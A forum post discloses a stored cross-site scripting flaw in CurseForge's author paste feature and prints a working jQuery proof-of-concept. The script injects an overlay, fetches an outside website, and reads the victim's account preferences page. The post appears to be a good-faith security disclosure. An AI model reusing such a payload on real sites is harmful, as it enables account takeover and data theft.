• 0

    posted a message on Security issue via paste functionality

    Currently the paste functionality under https://authors.curseforge.com/paste is broken. It allows for XSS without any limitations, as far as I can see. Proof (does nothing harmful): https://authors.curseforge.com/paste/19c967e3

     

    The code does:

    • make an XHR to an arbitrary website and output the result
    • make an XHR to curse itself and outputs your curse join date
    • change the DOM a bit

    Consequences are:

    • You can probably delete projects (and user accounts?)
    • You can read everything available on curseforge and pass it to some other website and save it
    • ...

     

    It's difficult to post the code even here on this forum, it could be vulnerable, too:

     

    <script>
    	$(function() {
    		$('body').append($('<div style="padding: 8px; position: absolute; left: 100px; top: 100px; z-index: 1000222222220; background-color: #f4f4f4; color: #444444; border: 1px solid #cdcdcd; width: 500px; height: 200px;" id="proof"><strong>Data fetched from foreign website:</strong><div id="foreign"></div><br><br><strong>Data fetched from Curse (your join date):</strong> <div id="curse"></div></div>'));
    
    		// DOM manipulation
    		$('.primary-header-wrapper').parent().remove();
    
    		$.get('https://levelupgilde.de/js/requests/getSquad.php', function(data) {
    			$('#foreign').html(data);
    		});
    
    		$.get('https://authors.curseforge.com/account/preferences', function(data) {
    			let str = $(data).find('span.tip').html();
    			$('#curse').html(str);
    		});
    
    		$(document).keyup(function(e) {
    			if(e.key === 'Escape') {
    				$('#proof').fadeOut();
    			}
    		});
    	});
    </script>
    Posted in: General Discussion
  • To post a comment, please or register a new account.